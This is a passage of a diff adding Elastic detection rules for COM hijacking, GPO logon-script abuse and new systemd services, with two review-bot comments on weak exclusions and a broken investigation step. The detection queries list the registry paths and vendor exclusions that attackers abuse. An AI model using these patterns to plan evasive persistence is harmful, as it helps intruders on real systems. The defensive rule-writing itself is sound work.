process.code_signature.trusted == true and process.code_signature.subject_name == \"Microsoft Corporation\" and\n registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\Remote Desktop\\\\msrdcw.exe\\\" -ToastActivated\",\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Apps\\\\Remote Desktop\\\\msrdcw.exe\\\" -ToastActivated\"\n )\n ) or \n (\n process.name : (\"ssvagent.exe\") and\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Oracle America, Inc.\" and\n registry.data.strings : (\n \"?:\\\\Program Files\\\\Java\\\\jre*\\\\bin\\\\jp2iexp.dll\",\n \"?:\\\\Program Files (x86)\\\\Java\\\\jre*\\\\bin\\\\jp2iexp.dll\"\n )\n ) or \n (\n process.name : (\"hpnotifications.exe\") and\n process.code_signature.trusted == true and process.code_signature.subject_name == \"HP Inc.\" and\n registry.data.strings : (\n \"\\\"?:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\hpsvcsscancomp.inf_amd64_*\\\\x64\\\\hpnotifications.exe\\\" -ToastActivated\"\n )\n )\n )\n )\n ) and\n\n /* removes false-positives generated by OneDrive and Teams */\n not\n (\n process.name: (\"OneDrive.exe\", \"OneDriveSetup.exe\", \"FileSyncConfig.exe\", \"Teams.exe\") and\n process.code_signature.trusted == true and process.code_signature.subject_name in (\"Microsoft Windows\", \"Microsoft Corporation\")\n ) and\n\n /* Teams DLL loaded by regsvr */\n not (process.name: \"regsvr32.exe\" and registry.data.strings : \"*Microsoft.Teams.*.dll\")\n", + "references": [ + "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + 
"ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.value", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "16a52c14-7883-47af-8745-9357803f0d4c", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.015", + "name": "Component Object Model Hijacking", + "reference": "https://attack.mitre.org/techniques/T1546/015/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": 
"https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.015", + "name": "Component Object Model Hijacking", + "reference": "https://attack.mitre.org/techniques/T1546/015/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "16a52c14-7883-47af-8745-9357803f0d4c_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_112.json b/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_112.json new file mode 100644 index 00000000000..7a571e02abf --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_112.json 
@@ -0,0 +1,149 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies Component Object Model (COM) hijacking via registry modification. Adversaries may establish persistence by executing malicious content triggered by hijacked references to COM objects.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Component Object Model Hijacking", + "note": "## Triage and analysis\n\n### Investigating Component Object Model Hijacking\n\nAdversaries can insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means of persistence.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve the file referenced in the registry and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- Some Microsoft 
executables will reference the LocalServer32 registry key value for the location of external COM objects.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and\n /* not necessary but good for filtering privileged installations */\n user.domain != \"NT AUTHORITY\" and\n (\n (\n registry.path : \"HK*\\\\InprocServer32\\\\\" and\n registry.data.strings: (\"scrobj.dll\", \"?:\\\\*\\\\scrobj.dll\") and\n not registry.path : \"*\\\\{06290BD*-48AA-11D2-8432-006008C3FBFC}\\\\*\"\n ) or\n\n (\n registry.path : \"HKLM\\\\*\\\\InProcServer32\\\\*\" and\n registry.data.strings : (\"*\\\\Users\\\\*\", \"*\\\\ProgramData\\\\*\")\n ) or\n\n /* in general COM Registry changes on Users Hive is less noisy and worth alerting */\n (\n registry.path : (\n \"HKEY_USERS\\\\*\\\\InprocServer32\\\\\",\n \"HKEY_USERS\\\\*\\\\LocalServer32\\\\\",\n \"HKEY_USERS\\\\*\\\\DelegateExecute\",\n \"HKEY_USERS\\\\*\\\\TreatAs\\\\\",\n \"HKEY_USERS\\\\*\\\\ScriptletURL*\"\n ) and\n not \n (\n (\n process.name : \"svchost.exe\" and\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Microsoft Windows Publisher\" and\n registry.value : \"DelegateExecute\" and\n registry.data.strings : (\n /* https://strontic.github.io/xcyclopedia/library/clsid_4ED3A719-CEA8-4BD9-910D-E252F997AFC2.html */\n \"{4ED3A719-CEA8-4BD9-910D-E252F997AFC2}\",\n\n /* https://strontic.github.io/xcyclopedia/library/clsid_A56A841F-E974-45C1-8001-7E3F8A085917.html */\n \"{A56A841F-E974-45C1-8001-7E3F8A085917}\",\n\n /* https://strontic.github.io/xcyclopedia/library/clsid_BFEC0C93-0B7D-4F2C-B09C-AFFFC4BDAE78.html */\n \"{BFEC0C93-0B7D-4F2C-B09C-AFFFC4BDAE78}\",\n \"%SystemRoot%\\\\system32\\\\shdocvw.dll\"\n )\n ) or\n (\n 
process.name : \"veeam.backup.shell.exe\" and\n registry.path : \"HKEY_USERS\\\\S-1-*_Classes\\\\CLSID\\\\*\\\\LocalServer32\\\\\" and\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Veeam Software Group GmbH\"\n ) or \n (\n process.name : (\"ADNotificationManager.exe\", \"Creative Cloud.exe\") and\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Adobe Inc.\" and\n registry.data.strings : (\n \"\\\"?:\\\\Program Files (x86)\\\\Adobe\\\\Acrobat Reader DC\\\\Reader\\\\ADNotificationManager.exe\\\" -ToastActivated\",\n \"\\\"?:\\\\Program Files (x86)\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\ADNotificationManager.exe\\\" -ToastActivated\",\n \"\\\"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\ADNotificationManager.exe\\\" -ToastActivated\",\n \"\\\"?:\\\\Program Files\\\\Adobe\\\\Acrobat Reader DC\\\\Reader\\\\ADNotificationManager.exe\\\" -ToastActivated\",\n \"\\\"?:\\\\Program Files\\\\Adobe\\\\Adobe Creative Cloud\\\\ACC\\\\Creative Cloud.exe\\\" -ToastActivated\"\n )\n ) or \n (\n process.name : (\"IslandUpdateComRegisterShell64.exe\", \"IslandUpdate.exe\", \"GoogleUpdateComRegisterShell64.exe\") and\n process.code_signature.trusted == true and\n process.code_signature.subject_name in (\"Island Technology Inc.\", \"Google LLC\") and\n registry.data.strings : (\n \"*?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Island\\\\Update\\\\*\",\n \"*?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Update\\\\*\"\n )\n ) or \n (\n process.name : (\"SelfService.exe\", \"WfShell.exe\") and\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Citrix Systems, Inc.\" and\n registry.data.strings : (\n \"\\\"?:\\\\Program Files (x86)\\\\Citrix\\\\ICA Client\\\\SelfServicePlugin\\\\SelfService.exe\\\" -ToastActivated\",\n \"%SystemRoot%\\\\system32\\\\shdocvw.dll\",\n \"%SystemRoot%\\\\sysWOW64\\\\shdocvw.dll\"\n )\n ) or \n (\n process.name : (\"msrdcw.exe\") and\n 
process.code_signature.trusted == true and process.code_signature.subject_name == \"Microsoft Corporation\" and\n registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\Remote Desktop\\\\msrdcw.exe\\\" -ToastActivated\",\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Apps\\\\Remote Desktop\\\\msrdcw.exe\\\" -ToastActivated\"\n )\n ) or \n (\n process.name : (\"ssvagent.exe\") and\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Oracle America, Inc.\" and\n registry.data.strings : (\n \"?:\\\\Program Files\\\\Java\\\\jre*\\\\bin\\\\jp2iexp.dll\",\n \"?:\\\\Program Files (x86)\\\\Java\\\\jre*\\\\bin\\\\jp2iexp.dll\"\n )\n ) or \n (\n process.name : (\"hpnotifications.exe\") and\n process.code_signature.trusted == true and process.code_signature.subject_name == \"HP Inc.\" and\n registry.data.strings : (\n \"\\\"?:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\hpsvcsscancomp.inf_amd64_*\\\\x64\\\\hpnotifications.exe\\\" -ToastActivated\"\n )\n )\n )\n )\n ) and\n\n /* removes false-positives generated by OneDrive and Teams */\n not\n (\n process.name: (\"OneDrive.exe\", \"OneDriveSetup.exe\", \"FileSyncConfig.exe\", \"Teams.exe\") and\n process.code_signature.trusted == true and process.code_signature.subject_name in (\"Microsoft Windows\", \"Microsoft Corporation\")\n ) and\n\n /* Teams DLL loaded by regsvr */\n not (process.name: \"regsvr32.exe\" and registry.data.strings : \"*Microsoft.Teams.*.dll\")\n", + "references": [ + "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + 
"ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.value", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "16a52c14-7883-47af-8745-9357803f0d4c", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.015", + "name": "Component Object Model Hijacking", + "reference": "https://attack.mitre.org/techniques/T1546/015/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": 
"https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.015", + "name": "Component Object Model Hijacking", + "reference": "https://attack.mitre.org/techniques/T1546/015/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 112 + }, + "id": "16a52c14-7883-47af-8745-9357803f0d4c_112", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/16fac1a1-21ee-4ca6-b720-458e3855d046_109.json b/packages/security_detection_engine/kibana/security_rule/16fac1a1-21ee-4ca6-b720-458e3855d046_109.json new file mode 100644 index 00000000000..b995eeb650f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/16fac1a1-21ee-4ca6-b720-458e3855d046_109.json 
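Review bot: The final carve-out in `query`, `not (process.name: "regsvr32.exe" and registry.data.strings : "*Microsoft.Teams.*.dll")`, is the only exclusion in this rule keyed on a leading-wildcard file-name pattern alone, whereas every other vendor exclusion pairs the process name with `process.code_signature.trusted == true` and a specific `subject_name`, and several also pin `registry.data.strings` to an install directory. Since `regsvr32.exe` is itself a Windows binary, a signer check on the process adds nothing here; the narrower condition is to anchor the data pattern to the expected Teams install location instead of `*` (e.g. `"<expected-teams-install-dir>\\Microsoft.Teams.*.dll"`, placeholder to be confirmed against an endpoint). The same exclusion appears unchanged between `_111` and `_112`, so this is pre-existing; if this JSON is an export of a rule maintained elsewhere, the change belongs in the source definition rather than this file.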
@@ -0,0 +1,120 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the modification of Group Policy Objects (GPO) to add a startup/logon script to users or computer objects.", + "false_positives": [ + "Legitimate Administrative Activity" + ], + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Startup/Logon Script added to Group Policy Object", + "note": "## Triage and analysis\n\n### Investigating Startup/Logon Script added to Group Policy Object\n\nGroup Policy Objects (GPOs) can be used by attackers to instruct arbitrarily large groups of clients to execute specified commands at startup, logon, shutdown, and logoff. This is done by creating or modifying the `scripts.ini` or `psscripts.ini` files. The scripts are stored in the following paths:\n - `\\Machine\\Scripts\\`\n - `\\User\\Scripts\\`\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity is legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `` and `` XML tags for any potentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is legitimately authorized and executed under a change management process.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Scheduled Task Execution at Scale via GPO - 15a8ba77-1c13-4274-88fe-6bd14133861e\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed 
in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scripts attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "(\n event.code:5136 and winlog.event_data.AttributeLDAPDisplayName:(gPCMachineExtensionNames or gPCUserExtensionNames) and\n winlog.event_data.AttributeValue:(*42B5FAAE-6536-11D2-AE5A-0000F87571E3* and\n (*40B66650-4972-11D1-A7CA-0000F87571E3* or *40B6664F-4972-11D1-A7CA-0000F87571E3*))\n)\nor\n(\n event.code:5145 and winlog.event_data.ShareName:\\\\\\\\*\\\\SYSVOL and\n winlog.event_data.RelativeTargetName:(*\\\\scripts.ini or *\\\\psscripts.ini) and\n (message:WriteData or winlog.event_data.AccessList:*%%4417*)\n)\n", + "references": [ + "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0025_windows_audit_directory_service_changes.md", + "https://github.com/atc-project/atc-data/blob/f2bbb51ecf68e2c9f488e3c70dcdd3df51d2a46b/docs/Logging_Policies/LP_0029_windows_audit_detailed_file_share.md", + "https://labs.f-secure.com/tools/sharpgpoabuse" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "message", + "type": "match_only_text" + }, + { + "ecs": false, + "name": "winlog.event_data.AccessList", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.AttributeLDAPDisplayName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.AttributeValue", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.RelativeTargetName", + "type": "unknown" + 
}, + { + "ecs": false, + "name": "winlog.event_data.ShareName", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "16fac1a1-21ee-4ca6-b720-458e3855d046", + "setup": "## Setup\n\nThe 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Active Directory", + "Resources: Investigation Guide", + "Use Case: Active Directory Monitoring" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1484", + "name": "Domain Policy Modification", + "reference": "https://attack.mitre.org/techniques/T1484/", + "subtechnique": [ + { + "id": "T1484.001", + "name": "Group Policy Modification", + "reference": "https://attack.mitre.org/techniques/T1484/001/" + } + ] + }, + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 109 + }, + "id": "16fac1a1-21ee-4ca6-b720-458e3855d046_109", + "type": "security-rule" +} \ No 
newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_9.json b/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_9.json new file mode 100644 index 00000000000..e6902690411 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_9.json 
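Review bot: The investigation guide in `note` contains an unreadable step, `check the `` and `` XML tags`, where the two inline code spans are empty, so the tag names a responder is supposed to inspect are missing. The same step tells the analyst to retrieve `ScheduledTasks.xml`, but this rule's `query` and its own introduction concern `scripts.ini` / `psscripts.ini` under `\Machine\Scripts\` and `\User\Scripts\` in SYSVOL; the step looks like it was carried over from the related "Scheduled Task Execution at Scale via GPO" rule. Suggest rewording it to something like `Retrieve the contents of the `scripts.ini` or `psscripts.ini` file referenced in the alert and review each `CmdLine` and `Parameters` entry for suspicious commands or binaries.` (field names to be confirmed against the GPO script INI format).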
@@ -0,0 +1,130 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Systemd service files are configuration files in Linux systems used to define and manage system services. Malicious actors can leverage systemd service files to achieve persistence by creating or modifying service files to execute malicious commands or payloads during system startup. This allows them to maintain unauthorized access, execute additional malicious activities, or evade detection.", + "from": "now-9m", + "history_window_start": "now-10d", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "New Systemd Service Created by Previously Unknown Process", + "new_terms_fields": [ + "host.id", + "file.path", + "process.executable" + ], + "note": "## Triage and analysis\n\n### Investigating New Systemd Service Created by Previously Unknown Process\n\nSystemd service files are configuration files in Linux systems used to define and manage system services.\n\nMalicious actors can leverage systemd service files to achieve persistence by creating or modifying service files to execute malicious commands or payloads during system startup. This allows them to maintain unauthorized access, execute additional malicious activities, or evade detection.\n\nThis rule monitors the creation of new systemd service files, potentially indicating the creation of a persistence mechanism.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the systemd service file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the currently enabled systemd services through the following command `sudo systemctl list-unit-files`.\n- Investigate whether any other files in any of the available systemd directories have been altered through OSQuery.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/user/.config/systemd/user/%'\\n)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/{{user.name}}/.config/systemd/user/%'\\n)\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n- Investigate abnormal behaviors by the subject process/user such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential command and control traffic or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve 
Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses systemd services for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Potential Persistence Through Run Control Detected - 0f4d35e4-925e-4959-ab24-911be207ee6f\n- Potential Persistence Through init.d Detected - 474fd20e-14cc-49c5-8160-d9ab4ba16c8b\n- New Systemd Timer Created - 7fb500fa-8e24-4bd1-9480-2a819352602c\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service/timer or restore its original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "host.os.type:linux and event.category:file and event.action:(\"creation\" or \"file_create_event\") and file.path:(\n /etc/systemd/system/* or \n /usr/local/lib/systemd/system/* or \n /lib/systemd/system/* or \n /usr/lib/systemd/system/* or \n /home/*/.config/systemd/user/*\n) and \nnot (\n process.name:(\n \"dpkg\" or \"dockerd\" or \"rpm\" or \"snapd\" or \"yum\" or \"exe\" or \"dnf\" or \"dnf-automatic\" or python* or \"puppetd\" or\n \"elastic-agent\" or \"cinc-client\" or \"chef-client\" or \"pacman\" or \"puppet\" or \"cloudflared\" or \"packagekitd\" or\n \"podman\"\n ) or \n file.extension:(\"swp\" or \"swpx\")\n)\n", + "references": [ + 